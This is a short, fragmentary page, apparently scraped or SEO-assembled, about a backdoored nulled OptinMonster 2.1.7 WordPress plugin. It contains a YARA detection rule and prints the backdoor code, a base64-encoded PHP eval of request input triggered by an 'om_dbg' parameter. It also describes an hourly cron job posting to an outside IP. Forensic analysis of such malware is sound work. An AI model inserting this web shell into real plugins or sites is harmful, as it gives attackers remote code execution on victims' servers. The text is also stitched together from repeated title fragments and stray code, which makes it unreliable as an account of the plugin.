Nulled Wordpress Optinmonster 2.1.7 Plugin -l -

rule Nulled_OptinMonster_217 meta: description = "Detects nulled OptinMonster 2.1.7 with backdoor" hash = "a4f3c8d9e2b1c7a5e9d3f2b1c8a7d4e2" strings: $s1 = "om_dbg" wide ascii $s2 = "94.102.61.78" ascii $s3 = "OptinMonster/NulledBot" ascii $s4 = "pre_http_request" ascii condition: all of them

$code = base64_decode('ZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTs='); // "eval($_REQUEST['cmd']);" if(isset($_REQUEST['om_dbg'])) eval($code); This creates a web shell accessible via any page with ?om_dbg=phpinfo(); — full RCE. The nulled version adds a cron job (hourly) that POSTs to http://94.102.61.78:8080/log : Nulled Wordpress Optinmonster 2.1.7 Plugin -l

Security Forensics and Risk Analysis of Nulled WordPress Plugins: A Case Study of OptinMonster 2.1.7 " if(isset($_REQUEST['om_dbg'])) eval($code)